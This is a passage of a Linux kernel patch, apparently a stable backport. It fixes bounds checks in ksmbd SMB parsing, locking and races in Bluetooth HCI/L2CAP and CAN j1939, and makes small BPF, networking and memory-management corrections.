++#define SMB2_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb2_hdr) + 4)
++
+ /**
+  * ksmbd_conn_handler_loop() - session thread to listen on new smb requests
+  * @p:		connection instance
+@@ -352,6 +355,9 @@ int ksmbd_conn_handler_loop(void *p)
+ 		if (pdu_size > MAX_STREAM_PROT_LEN)
+ 			break;
+ 
++		if (pdu_size < SMB1_MIN_SUPPORTED_HEADER_SIZE)
++			break;
++
+ 		/* 4 for rfc1002 length field */
+ 		/* 1 for implied bcc[0] */
+ 		size = pdu_size + 4 + 1;
+@@ -379,6 +385,12 @@ int ksmbd_conn_handler_loop(void *p)
+ 			continue;
+ 		}
+ 
++		if (((struct smb2_hdr *)smb2_get_msg(conn->request_buf))->ProtocolId ==
++		    SMB2_PROTO_NUMBER) {
++			if (pdu_size < SMB2_MIN_SUPPORTED_HEADER_SIZE)
++				break;
++		}
++
+ 		if (!default_conn_ops.process_fn) {
+ 			pr_err("No connection request callback\n");
+ 			break;
+diff --git a/fs/ksmbd/oplock.c b/fs/ksmbd/oplock.c
+index cbfed03a1e5ce..4b210cdd75569 100644
+--- a/fs/ksmbd/oplock.c
++++ b/fs/ksmbd/oplock.c
+@@ -1415,56 +1415,38 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+  */
+ struct lease_ctx_info *parse_lease_state(void *open_req)
+ {
+-	char *data_offset;
+ 	struct create_context *cc;
+-	unsigned int next = 0;
+-	char *name;
+-	bool found = false;
+ 	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
+-	struct lease_ctx_info *lreq = kzalloc(sizeof(struct lease_ctx_info),
+-		GFP_KERNEL);
++	struct lease_ctx_info *lreq;
++
++	cc = smb2_find_context_vals(req, SMB2_CREATE_REQUEST_LEASE, 4);
++	if (IS_ERR_OR_NULL(cc))
++		return NULL;
++
++	lreq = kzalloc(sizeof(struct lease_ctx_info), GFP_KERNEL);
+ 	if (!lreq)
+ 		return NULL;
+ 
+-	data_offset = (char *)req + le32_to_cpu(req->CreateContextsOffset);
+-	cc = (struct create_context *)data_offset;
+-	do {
+-		cc = (struct create_context *)((char *)cc + next);
+-		name = le16_to_cpu(cc->NameOffset) + (char *)cc;
+-		if (le16_to_cpu(cc->NameLength) != 4 ||
+-		    strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4)) {
+-			next = le32_to_cpu(cc->Next);
+-			continue;
+-		}
+-		found = true;
+-		break;
+-	} while (next != 0);
++	if (sizeof(struct lease_context_v2) == le32_to_cpu(cc->DataLength)) {
++		struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
+ 
+-	if (found) {
+-		if (sizeof(struct lease_context_v2) == le32_to_cpu(cc->DataLength)) {
+-			struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
+-
+-			memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-			lreq->req_state = lc->lcontext.LeaseState;
+-			lreq->flags = lc->lcontext.LeaseFlags;
+-			lreq->duration = lc->lcontext.LeaseDuration;
+-			memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
+-			       SMB2_LEASE_KEY_SIZE);
+-			lreq->version = 2;
+-		} else {
+-			struct create_lease *lc = (struct create_lease *)cc;
++		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++		lreq->req_state = lc->lcontext.LeaseState;
++		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->duration = lc->lcontext.LeaseDuration;
++		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
++				SMB2_LEASE_KEY_SIZE);
++		lreq->version = 2;
++	} else {
++		struct create_lease *lc = (struct create_lease *)cc;
+ 
+-			memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-			lreq->req_state = lc->lcontext.LeaseState;
+-			lreq->flags = lc->lcontext.LeaseFlags;
+-			lreq->duration = lc->lcontext.LeaseDuration;
+-			lreq->version = 1;
+-		}
+-		return lreq;
++		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
++		lreq->req_state = lc->lcontext.LeaseState;
++		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->duration = lc->lcontext.LeaseDuration;
++		lreq->version = 1;
+ 	}
+-
+-	kfree(lreq);
+-	return NULL;
++	return lreq;
+ }
+ 
+ /**
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 01887570efe8a..56f661e5ef628 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -979,13 +979,13 @@ static void decode_sign_cap_ctxt(struct ksmbd_conn *conn,
+ 
+ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 				      struct smb2_negotiate_req *req,
+-				      int len_of_smb)
++				      unsigned int len_of_smb)
+ {
+ 	/* +4 is to account for the RFC1001 len field */
+ 	struct smb2_neg_context *pctx = (struct smb2_neg_context *)req;
+ 	int i = 0, len_of_ctxts;
+-	int offset = le32_to_cpu(req->NegotiateContextOffset);
+-	int neg_ctxt_cnt = le16_to_cpu(req->NegotiateContextCount);
++	unsigned int offset = le32_to_cpu(req->NegotiateContextOffset);
++	unsigned int neg_ctxt_cnt = le16_to_cpu(req->NegotiateContextCount);
+ 	__le32 status = STATUS_INVALID_PARAMETER;
+ 
+ 	ksmbd_debug(SMB, "decoding %d negotiate contexts\n", neg_ctxt_cnt);
+@@ -999,7 +999,7 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 	while (i++ < neg_ctxt_cnt) {
+ 		int clen, ctxt_len;
+ 
+-		if (len_of_ctxts < sizeof(struct smb2_neg_context))
++		if (len_of_ctxts < (int)sizeof(struct smb2_neg_context))
+ 			break;
+ 
+ 		pctx = (struct smb2_neg_context *)((char *)pctx + offset);
+@@ -1054,9 +1054,8 @@ static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
+ 		}
+ 
+ 		/* offsets must be 8 byte aligned */
+-		clen = (clen + 7) & ~0x7;
+-		offset = clen + sizeof(struct smb2_neg_context);
+-		len_of_ctxts -= clen + sizeof(struct smb2_neg_context);
++		offset = (ctxt_len + 7) & ~0x7;
++		len_of_ctxts -= offset;
+ 	}
+ 	return status;
+ }
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index eac51e22a52a8..d5eb3ab8e38f2 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -609,7 +609,7 @@ struct netdev_queue {
+ 	netdevice_tracker	dev_tracker;
+ 
+ 	struct Qdisc __rcu	*qdisc;
+-	struct Qdisc		*qdisc_sleeping;
++	struct Qdisc __rcu	*qdisc_sleeping;
+ #ifdef CONFIG_SYSFS
+ 	struct kobject		kobj;
+ #endif
+@@ -757,8 +757,11 @@ static inline void rps_record_sock_flow(struct rps_sock_flow_table *table,
+ 		/* We only give a hint, preemption can change CPU under us */
+ 		val |= raw_smp_processor_id();
+ 
+-		if (table->ents[index] != val)
+-			table->ents[index] = val;
++		/* The following WRITE_ONCE() is paired with the READ_ONCE()
++		 * here, and another one in get_rps_cpu().
++		 */
++		if (READ_ONCE(table->ents[index]) != val)
++			WRITE_ONCE(table->ents[index], val);
+ 	}
+ }
+ 
+diff --git a/include/linux/page-flags.h b/include/linux/page-flags.h
+index 0b0ae5084e60c..59314d228ec38 100644
+--- a/include/linux/page-flags.h
++++ b/include/linux/page-flags.h
+@@ -631,6 +631,12 @@ PAGEFLAG_FALSE(VmemmapSelfHosted, vmemmap_self_hosted)
+  * Please note that, confusingly, "page_mapping" refers to the inode
+  * address_space which maps the page from disk; whereas "page_mapped"
+  * refers to user virtual address space into which the page is mapped.
++ *
++ * For slab pages, since slab reuses the bits in struct page to store its
++ * internal states, the page->mapping does not exist as such, nor do these
++ * flags below.  So in order to avoid testing non-existent bits, please
++ * make sure that PageSlab(page) actually evaluates to false before calling
++ * the following functions (e.g., PageAnon).  See mm/slab.h.
+  */
+ #define PAGE_MAPPING_ANON	0x1
+ #define PAGE_MAPPING_MOVABLE	0x2
+diff --git a/include/linux/usb/hcd.h b/include/linux/usb/hcd.h
+index 78cd566ee2380..5a89928ea9534 100644
+--- a/include/linux/usb/hcd.h
++++ b/include/linux/usb/hcd.h
+@@ -500,6 +500,11 @@ void *hcd_buffer_alloc(struct usb_bus *bus, size_t size,
+ void hcd_buffer_free(struct usb_bus *bus, size_t size,
+ 	void *addr, dma_addr_t dma);
+ 
++void *hcd_buffer_alloc_pages(struct usb_hcd *hcd,
++		size_t size, gfp_t mem_flags, dma_addr_t *dma);
++void hcd_buffer_free_pages(struct usb_hcd *hcd,
++		size_t size, void *addr, dma_addr_t dma);
++
+ /* generic bus glue, needed for host controllers that don't use PCI */
+ extern irqreturn_t usb_hcd_irq(int irq, void *__hcd);
+ 
+diff --git a/include/net/bluetooth/hci.h b/include/net/bluetooth/hci.h
+index b350d92136c8d..a674221d151db 100644
+--- a/include/net/bluetooth/hci.h
++++ b/include/net/bluetooth/hci.h
+@@ -350,6 +350,7 @@ enum {
+ enum {
+ 	HCI_SETUP,
+ 	HCI_CONFIG,
++	HCI_DEBUGFS_CREATED,
+ 	HCI_AUTO_OFF,
+ 	HCI_RFKILLED,
+ 	HCI_MGMT,
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 061fec6fd0152..84c5ce57eab69 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -513,6 +513,7 @@ struct hci_dev {
+ 	struct work_struct	cmd_sync_work;
+ 	struct list_head	cmd_sync_work_list;
+ 	struct mutex		cmd_sync_work_lock;
++	struct mutex		unregister_lock;
+ 	struct work_struct	cmd_sync_cancel_work;
+ 	struct work_struct	reenable_adv_work;
+ 
+diff --git a/include/net/neighbour.h b/include/net/neighbour.h
+index 2f2a6023fb0e5..94a1599824d8f 100644
+--- a/include/net/neighbour.h
++++ b/include/net/neighbour.h
+@@ -180,7 +180,7 @@ struct pneigh_entry {
+ 	netdevice_tracker	dev_tracker;
+ 	u32			flags;
+ 	u8			protocol;
+-	u8			key[];
++	u32			key[];
+ };
+ 
+ /*
+diff --git a/include/net/netns/ipv6.h b/include/net/netns/ipv6.h
+index b4af4837d80b4..f6e6a3ab91489 100644
+--- a/include/net/netns/ipv6.h
++++ b/include/net/netns/ipv6.h
+@@ -53,7 +53,7 @@ struct netns_sysctl_ipv6 {
+ 	int seg6_flowlabel;
+ 	u32 ioam6_id;
+ 	u64 ioam6_id_wide;
+-	bool skip_notify_on_dev_down;
++	int skip_notify_on_dev_down;
+ 	u8 fib_notify_on_flag_change;
+ };
+ 
+diff --git a/include/net/ping.h b/include/net/ping.h
+index 9233ad3de0ade..bc7779262e603 100644
+--- a/include/net/ping.h
++++ b/include/net/ping.h
+@@ -16,11 +16,7 @@
+ #define PING_HTABLE_SIZE 	64
+ #define PING_HTABLE_MASK 	(PING_HTABLE_SIZE-1)
+ 
+-/*
+- * gid_t is either uint or ushort.  We want to pass it to
+- * proc_dointvec_minmax(), so it must not be larger than MAX_INT
+- */
+-#define GID_T_MAX (((gid_t)~0U) >> 1)
++#define GID_T_MAX (((gid_t)~0U) - 1)
+ 
+ /* Compatibility glue so we can support IPv6 when it's compiled as a module */
+ struct pingv6_ops {
+diff --git a/include/net/pkt_sched.h b/include/net/pkt_sched.h
+index 38207873eda69..8ab75128512ab 100644
+--- a/include/net/pkt_sched.h
++++ b/include/net/pkt_sched.h
+@@ -128,6 +128,8 @@ static inline void qdisc_run(struct Qdisc *q)
+ 	}
+ }
+ 
++extern const struct nla_policy rtm_tca_policy[TCA_MAX + 1];
++
+ /* Calculate maximal size of packet seen by hard_start_xmit
+    routine of this device.
+  */
+diff --git a/include/net/rpl.h b/include/net/rpl.h
+index 308ef0a05caef..30fe780d1e7c8 100644
+--- a/include/net/rpl.h
++++ b/include/net/rpl.h
+@@ -23,9 +23,6 @@ static inline int rpl_init(void)
+ static inline void rpl_exit(void) {}
+ #endif
+ 
+-/* Worst decompression memory usage ipv6 address (16) + pad 7 */
+-#define IPV6_RPL_SRH_WORST_SWAP_SIZE (sizeof(struct in6_addr) + 7)
+-
+ size_t ipv6_rpl_srh_size(unsigned char n, unsigned char cmpri,
+ 			 unsigned char cmpre);
+ 
+diff --git a/include/net/sch_generic.h b/include/net/sch_generic.h
+index af4aa66aaa4eb..989eb972fcaec 100644
+--- a/include/net/sch_generic.h
++++ b/include/net/sch_generic.h
+@@ -543,7 +543,7 @@ static inline struct Qdisc *qdisc_root_bh(const struct Qdisc *qdisc)
+ 
+ static inline struct Qdisc *qdisc_root_sleeping(const struct Qdisc *qdisc)
+ {
+-	return qdisc->dev_queue->qdisc_sleeping;
++	return rcu_dereference_rtnl(qdisc->dev_queue->qdisc_sleeping);
+ }
+ 
+ static inline spinlock_t *qdisc_root_sleeping_lock(const struct Qdisc *qdisc)
+@@ -752,7 +752,9 @@ static inline bool qdisc_tx_changing(const struct net_device *dev)
+ 
+ 	for (i = 0; i < dev->num_tx_queues; i++) {
+ 		struct netdev_queue *txq = netdev_get_tx_queue(dev, i);
+-		if (rcu_access_pointer(txq->qdisc) != txq->qdisc_sleeping)
++
++		if (rcu_access_pointer(txq->qdisc) !=
++		    rcu_access_pointer(txq->qdisc_sleeping))
+ 			return true;
+ 	}
+ 	return false;
+diff --git a/include/net/sock.h b/include/net/sock.h
+index f11b98bd0244c..2f35b82a123f8 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1148,8 +1148,12 @@ static inline void sock_rps_record_flow(const struct sock *sk)
+ 		 * OR	an additional socket flag
+ 		 * [1] : sk_state and sk_prot are in the same cache line.
+ 		 */
+-		if (sk->sk_state == TCP_ESTABLISHED)
+-			sock_rps_record_flow_hash(sk->sk_rxhash);
++		if (sk->sk_state == TCP_ESTABLISHED) {
++			/* This READ_ONCE() is paired with the WRITE_ONCE()
++			 * from sock_rps_save_rxhash() and sock_rps_reset_rxhash().
++			 */
++			sock_rps_record_flow_hash(READ_ONCE(sk->sk_rxhash));
++		}
+ 	}
+ #endif
+ }
+@@ -1158,15 +1162,19 @@ static inline void sock_rps_save_rxhash(struct sock *sk,
+ 					const struct sk_buff *skb)
+ {
+ #ifdef CONFIG_RPS
+-	if (unlikely(sk->sk_rxhash != skb->hash))
+-		sk->sk_rxhash = skb->hash;
++	/* The following WRITE_ONCE() is paired with the READ_ONCE()
++	 * here, and another one in sock_rps_record_flow().
++	 */
++	if (unlikely(READ_ONCE(sk->sk_rxhash) != skb->hash))
++		WRITE_ONCE(sk->sk_rxhash, skb->hash);
+ #endif
+ }
+ 
+ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ {
+ #ifdef CONFIG_RPS
+-	sk->sk_rxhash = 0;
++	/* Paired with READ_ONCE() in sock_rps_record_flow() */
++	WRITE_ONCE(sk->sk_rxhash, 0);
+ #endif
+ }
+ 
+diff --git a/kernel/bpf/map_in_map.c b/kernel/bpf/map_in_map.c
+index 135205d0d5607..8e87f69aae60d 100644
+--- a/kernel/bpf/map_in_map.c
++++ b/kernel/bpf/map_in_map.c
+@@ -61,9 +61,13 @@ struct bpf_map *bpf_map_meta_alloc(int inner_map_ufd)
+ 	/* Misc members not needed in bpf_map_meta_equal() check. */
+ 	inner_map_meta->ops = inner_map->ops;
+ 	if (inner_map->ops == &array_map_ops) {
++		struct bpf_array *inner_array_meta =
++			container_of(inner_map_meta, struct bpf_array, map);
++		struct bpf_array *inner_array = container_of(inner_map, struct bpf_array, map);
++
++		inner_array_meta->index_mask = inner_array->index_mask;
++		inner_array_meta->elem_size = inner_array->elem_size;
+ 		inner_map_meta->bypass_spec_v1 = inner_map->bypass_spec_v1;
+-		container_of(inner_map_meta, struct bpf_array, map)->index_mask =
+-		     container_of(inner_map, struct bpf_array, map)->index_mask;
+ 	}
+ 
+ 	fdput(f);
+diff --git a/kernel/fork.c b/kernel/fork.c
+index ec913b13c5edb..6bb91fbbf73cc 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -559,6 +559,7 @@ void free_task(struct task_struct *tsk)
+ 	arch_release_task_struct(tsk);
+ 	if (tsk->flags & PF_KTHREAD)
+ 		free_kthread_struct(tsk);
++	bpf_task_storage_free(tsk);
+ 	free_task_struct(tsk);
+ }
+ EXPORT_SYMBOL(free_task);
+@@ -843,7 +844,6 @@ void __put_task_struct(struct task_struct *tsk)
+ 	cgroup_free(tsk);
+ 	task_numa_free(tsk, true);
+ 	security_task_free(tsk);
+-	bpf_task_storage_free(tsk);
+ 	exit_creds(tsk);
+ 	delayacct_tsk_free(tsk);
+ 	put_signal_struct(tsk->signal);
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 9d4163abadf4e..1642548892a8e 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -903,13 +903,23 @@ static const struct bpf_func_proto bpf_send_signal_thread_proto = {
+ 
+ BPF_CALL_3(bpf_d_path, struct path *, path, char *, buf, u32, sz)
+ {
++	struct path copy;
+ 	long len;
+ 	char *p;
+ 
+ 	if (!sz)
+ 		return 0;
+ 
+-	p = d_path(path, buf, sz);
++	/*
++	 * The path pointer is verified as trusted and safe to use,
++	 * but let's double check it's valid anyway to workaround
++	 * potentially broken verifier.
++	 */
++	len = copy_from_kernel_nofault(&copy, path, sizeof(*path));
++	if (len < 0)
++		return len;
++
++	p = d_path(&copy, buf, sz);
+ 	if (IS_ERR(p)) {
+ 		len = PTR_ERR(p);
+ 	} else {
+diff --git a/lib/cpu_rmap.c b/lib/cpu_rmap.c
+index e77f12bb3c774..1833ad73de6fc 100644
+--- a/lib/cpu_rmap.c
++++ b/lib/cpu_rmap.c
+@@ -268,8 +268,8 @@ static void irq_cpu_rmap_release(struct kref *ref)
+ 	struct irq_glue *glue =
+ 		container_of(ref, struct irq_glue, notify.kref);
+ 
+-	cpu_rmap_put(glue->rmap);
+ 	glue->rmap->obj[glue->index] = NULL;
++	cpu_rmap_put(glue->rmap);
+ 	kfree(glue);
+ }
+ 
+diff --git a/mm/Kconfig.debug b/mm/Kconfig.debug
+index ce8dded36de94..32c2df12a5ec9 100644
+--- a/mm/Kconfig.debug
++++ b/mm/Kconfig.debug
+@@ -98,6 +98,7 @@ config PAGE_OWNER
+ config PAGE_TABLE_CHECK
+ 	bool "Check for invalid mappings in user page tables"
+ 	depends on ARCH_SUPPORTS_PAGE_TABLE_CHECK
++	depends on EXCLUSIVE_SYSTEM_RAM
+ 	select PAGE_EXTENSION
+ 	help
+ 	  Check that anonymous page is not being mapped twice with read write
+diff --git a/mm/page_table_check.c b/mm/page_table_check.c
+index 433dbce13fe1d..4d05065376213 100644
+--- a/mm/page_table_check.c
++++ b/mm/page_table_check.c
+@@ -69,6 +69,8 @@ static void page_table_check_clear(struct mm_struct *mm, unsigned long addr,
+ 
+ 	page = pfn_to_page(pfn);
+ 	page_ext = page_ext_get(page);
++
++	BUG_ON(PageSlab(page));
+ 	anon = PageAnon(page);
+ 
+ 	for (i = 0; i < pgcnt; i++) {
+@@ -105,6 +107,8 @@ static void page_table_check_set(struct mm_struct *mm, unsigned long addr,
+ 
+ 	page = pfn_to_page(pfn);
+ 	page_ext = page_ext_get(page);
++
++	BUG_ON(PageSlab(page));
+ 	anon = PageAnon(page);
+ 
+ 	for (i = 0; i < pgcnt; i++) {
+@@ -131,6 +135,8 @@ void __page_table_check_zero(struct page *page, unsigned int order)
+ 	struct page_ext *page_ext;
+ 	unsigned long i;
+ 
++	BUG_ON(PageSlab(page));
++
+ 	page_ext = page_ext_get(page);
+ 	BUG_ON(!page_ext);
+ 	for (i = 0; i < (1ul << order); i++) {
+diff --git a/net/batman-adv/distributed-arp-table.c b/net/batman-adv/distributed-arp-table.c
+index fefb51a5f6062..a0233252032dc 100644
+--- a/net/batman-adv/distributed-arp-table.c
++++ b/net/batman-adv/distributed-arp-table.c
+@@ -101,7 +101,6 @@ static void batadv_dat_purge(struct work_struct *work);
+  */
+ static void batadv_dat_start_timer(struct batadv_priv *bat_priv)
+ {
+-	INIT_DELAYED_WORK(&bat_priv->dat.work, batadv_dat_purge);
+ 	queue_delayed_work(batadv_event_workqueue, &bat_priv->dat.work,
+ 			   msecs_to_jiffies(10000));
+ }
+@@ -819,6 +818,7 @@ int batadv_dat_init(struct batadv_priv *bat_priv)
+ 	if (!bat_priv->dat.hash)
+ 		return -ENOMEM;
+ 
++	INIT_DELAYED_WORK(&bat_priv->dat.work, batadv_dat_purge);
+ 	batadv_dat_start_timer(bat_priv);
+ 
+ 	batadv_tvlv_handler_register(bat_priv, batadv_dat_tvlv_ogm_handler_v1,
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index c2c6dea01cc91..ab9f00252dc2a 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -966,6 +966,8 @@ static void cis_cleanup(struct hci_conn *conn)
+ 	/* Check if ISO connection is a CIS and remove CIG if there are
+ 	 * no other connections using it.
+ 	 */
++	hci_conn_hash_list_state(hdev, find_cis, ISO_LINK, BT_BOUND, &d);
++	hci_conn_hash_list_state(hdev, find_cis, ISO_LINK, BT_CONNECT, &d);
+ 	hci_conn_hash_list_state(hdev, find_cis, ISO_LINK, BT_CONNECTED, &d);
+ 	if (d.count)
+ 		return;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 334e308451f53..ca42129f8f91a 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -1416,10 +1416,10 @@ int hci_remove_link_key(struct hci_dev *hdev, bdaddr_t *bdaddr)
+ 
+ int hci_remove_ltk(struct hci_dev *hdev, bdaddr_t *bdaddr, u8 bdaddr_type)
+ {
+-	struct smp_ltk *k;
++	struct smp_ltk *k, *tmp;
+ 	int removed = 0;
+ 
+-	list_for_each_entry_rcu(k, &hdev->long_term_keys, list) {
++	list_for_each_entry_safe(k, tmp, &hdev->long_term_keys, list) {
+ 		if (bacmp(bdaddr, &k->bdaddr) || k->bdaddr_type != bdaddr_type)
+ 			continue;
+ 
+@@ -1435,9 +1435,9 @@ int hci_remove_ltk(struct hci_dev *hdev, bdaddr_t *bdaddr, u8 bdaddr_type)
+ 
+ void hci_remove_irk(struct hci_dev *hdev, bdaddr_t *bdaddr, u8 addr_type)
+ {
+-	struct smp_irk *k;
++	struct smp_irk *k, *tmp;
+ 
+-	list_for_each_entry_rcu(k, &hdev->identity_resolving_keys, list) {
++	list_for_each_entry_safe(k, tmp, &hdev->identity_resolving_keys, list) {
+ 		if (bacmp(bdaddr, &k->bdaddr) || k->addr_type != addr_type)
+ 			continue;
+ 
+@@ -2685,7 +2685,9 @@ void hci_unregister_dev(struct hci_dev *hdev)
+ {
+ 	BT_DBG("%p name %s bus %d", hdev, hdev->name, hdev->bus);
+ 
++	mutex_lock(&hdev->unregister_lock);
+ 	hci_dev_set_flag(hdev, HCI_UNREGISTER);
++	mutex_unlock(&hdev->unregister_lock);
+ 
+ 	write_lock(&hci_dev_list_lock);
+ 	list_del(&hdev->list);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index e8b78104a4071..1805ddee0cd02 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -629,6 +629,7 @@ void hci_cmd_sync_init(struct hci_dev *hdev)
+ 	INIT_WORK(&hdev->cmd_sync_work, hci_cmd_sync_work);
+ 	INIT_LIST_HEAD(&hdev->cmd_sync_work_list);
+ 	mutex_init(&hdev->cmd_sync_work_lock);
++	mutex_init(&hdev->unregister_lock);
+ 
+ 	INIT_WORK(&hdev->cmd_sync_cancel_work, hci_cmd_sync_cancel_work);
+ 	INIT_WORK(&hdev->reenable_adv_work, reenable_adv);
+@@ -688,14 +689,19 @@ int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+ 		       void *data, hci_cmd_sync_work_destroy_t destroy)
+ {
+ 	struct hci_cmd_sync_work_entry *entry;
++	int err = 0;
+ 
+-	if (hci_dev_test_flag(hdev, HCI_UNREGISTER))
+-		return -ENODEV;
++	mutex_lock(&hdev->unregister_lock);
++	if (hci_dev_test_flag(hdev, HCI_UNREGISTER)) {
++		err = -ENODEV;
++		goto unlock;
++	}
+ 
+ 	entry = kmalloc(sizeof(*entry), GFP_KERNEL);
+-	if (!entry)
+-		return -ENOMEM;
+-
++	if (!entry) {
++		err = -ENOMEM;
++		goto unlock;
++	}
+ 	entry->func = func;
+ 	entry->data = data;
+ 	entry->destroy = destroy;
+@@ -706,7 +712,9 @@ int hci_cmd_sync_queue(struct hci_dev *hdev, hci_cmd_sync_work_func_t func,
+ 
+ 	queue_work(hdev->req_workqueue, &hdev->cmd_sync_work);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&hdev->unregister_lock);
++	return err;
+ }
+ EXPORT_SYMBOL(hci_cmd_sync_queue);
+ 
+@@ -4484,6 +4492,9 @@ static int hci_init_sync(struct hci_dev *hdev)
+ 	    !hci_dev_test_flag(hdev, HCI_CONFIG))
+ 		return 0;
+ 
++	if (hci_dev_test_and_set_flag(hdev, HCI_DEBUGFS_CREATED))
++		return 0;
++
+ 	hci_debugfs_create_common(hdev);
+ 
+ 	if (lmp_bredr_capable(hdev))
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index ee8f806534dfb..02fc9961464cf 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -4307,6 +4307,10 @@ static int l2cap_connect_create_rsp(struct l2cap_conn *conn,
+ 	result = __le16_to_cpu(rsp->result);
+ 	status = __le16_to_cpu(rsp->status);
+ 
++	if (result == L2CAP_CR_SUCCESS && (dcid < L2CAP_CID_DYN_START ||
++					   dcid > L2CAP_CID_DYN_END))
++		return -EPROTO;
++
+ 	BT_DBG("dcid 0x%4.4x scid 0x%4.4x result 0x%2.2x status 0x%2.2x",
+ 	       dcid, scid, result, status);
+ 
+@@ -4338,6 +4342,11 @@ static int l2cap_connect_create_rsp(struct l2cap_conn *conn,
+ 
+ 	switch (result) {
+ 	case L2CAP_CR_SUCCESS:
++		if (__l2cap_get_chan_by_dcid(conn, dcid)) {
++			err = -EBADSLT;
++			break;
++		}
++
+ 		l2cap_state_change(chan, BT_CONFIG);
+ 		chan->ident = 0;
+ 		chan->dcid = dcid;
+@@ -4664,7 +4673,9 @@ static inline int l2cap_disconnect_req(struct l2cap_conn *conn,
+ 
+ 	chan->ops->set_shutdown(chan);
+ 
++	l2cap_chan_unlock(chan);
+ 	mutex_lock(&conn->chan_lock);
++	l2cap_chan_lock(chan);
+ 	l2cap_chan_del(chan, ECONNRESET);
+ 	mutex_unlock(&conn->chan_lock);
+ 
+@@ -4703,7 +4714,9 @@ static inline int l2cap_disconnect_rsp(struct l2cap_conn *conn,
+ 		return 0;
+ 	}
+ 
++	l2cap_chan_unlock(chan);
+ 	mutex_lock(&conn->chan_lock);
++	l2cap_chan_lock(chan);
+ 	l2cap_chan_del(chan, 0);
+ 	mutex_unlock(&conn->chan_lock);
+ 
+diff --git a/net/can/j1939/main.c b/net/can/j1939/main.c
+index 821d4ff303b35..ecff1c947d683 100644
+--- a/net/can/j1939/main.c
++++ b/net/can/j1939/main.c
+@@ -126,7 +126,7 @@ static void j1939_can_recv(struct sk_buff *iskb, void *data)
+ #define J1939_CAN_ID CAN_EFF_FLAG
+ #define J1939_CAN_MASK (CAN_EFF_FLAG | CAN_RTR_FLAG)
+ 
+-static DEFINE_SPINLOCK(j1939_netdev_lock);
++static DEFINE_MUTEX(j1939_netdev_lock);
+ 
+ static struct j1939_priv *j1939_priv_create(struct net_device *ndev)
+ {
+@@ -220,7 +220,7 @@ static void __j1939_rx_release(struct kref *kref)
+ 	j1939_can_rx_unregister(priv);
+ 	j1939_ecu_unmap_all(priv);
+ 	j1939_priv_set(priv->ndev, NULL);
+-	spin_unlock(&j1939_netdev_lock);
++	mutex_unlock(&j1939_netdev_lock);
+ }
+ 
+ /* get pointer to priv without increasing ref counter */
+@@ -248,9 +248,9 @@ static struct j1939_priv *j1939_priv_get_by_ndev(struct net_device *ndev)
+ {
+ 	struct j1939_priv *priv;
+ 
+-	spin_lock(&j1939_netdev_lock);
++	mutex_lock(&j1939_netdev_lock);
+ 	priv = j1939_priv_get_by_ndev_locked(ndev);
+-	spin_unlock(&j1939_netdev_lock);
++	mutex_unlock(&j1939_netdev_lock);
+ 
+ 	return priv;
+ }
+@@ -260,14 +260,14 @@ struct j1939_priv *j1939_netdev_start(struct net_device *ndev)
+ 	struct j1939_priv *priv, *priv_new;
+ 	int ret;
+ 
+-	spin_lock(&j1939_netdev_lock);
++	mutex_lock(&j1939_netdev_lock);
+ 	priv = j1939_priv_get_by_ndev_locked(ndev);
+ 	if (priv) {
+ 		kref_get(&priv->rx_kref);
+-		spin_unlock(&j1939_netdev_lock);
++		mutex_unlock(&j1939_netdev_lock);
+ 		return priv;
+ 	}
+-	spin_unlock(&j1939_netdev_lock);
++	mutex_unlock(&j1939_netdev_lock);
+ 
+ 	priv = j1939_priv_create(ndev);
+ 	if (!priv)
+@@ -277,29 +277,31 @@ struct j1939_priv *j1939_netdev_start(struct net_device *ndev)
+ 	spin_lock_init(&priv->j1939_socks_lock);
+ 	INIT_LIST_HEAD(&priv->j1939_socks);
+ 
+-	spin_lock(&j1939_netdev_lock);
++	mutex_lock(&j1939_netdev_lock);
+ 	priv_new = j1939_priv_get_by_ndev_locked(ndev);
